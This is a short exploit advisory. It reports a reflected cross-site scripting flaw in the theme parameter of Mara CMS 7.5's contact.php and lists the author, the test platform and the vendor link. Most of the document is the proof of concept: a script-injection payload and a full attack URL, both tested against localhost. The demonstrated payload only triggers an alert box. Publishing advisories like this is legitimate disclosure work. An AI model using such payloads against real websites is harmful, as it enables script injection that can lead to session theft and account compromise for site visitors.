==============================================================================
| # Title     : Mara CMS 7.5 Cross Site Scripting                            |
| # Author    : George Tsimpidas                                             |
| # Tested on : Kali Linux (X64)                                             |
| # Vendor    : https://sourceforge.net/projects/maracms/                    |
==============================================================================

PoC


[+] Use Payload : seven69387';alert(1)//154

Path : http://localhost/contact.php?theme=< inject payload here>

Full Poc :
http://localhost/contact.php?theme=seven69387';alert(1)//154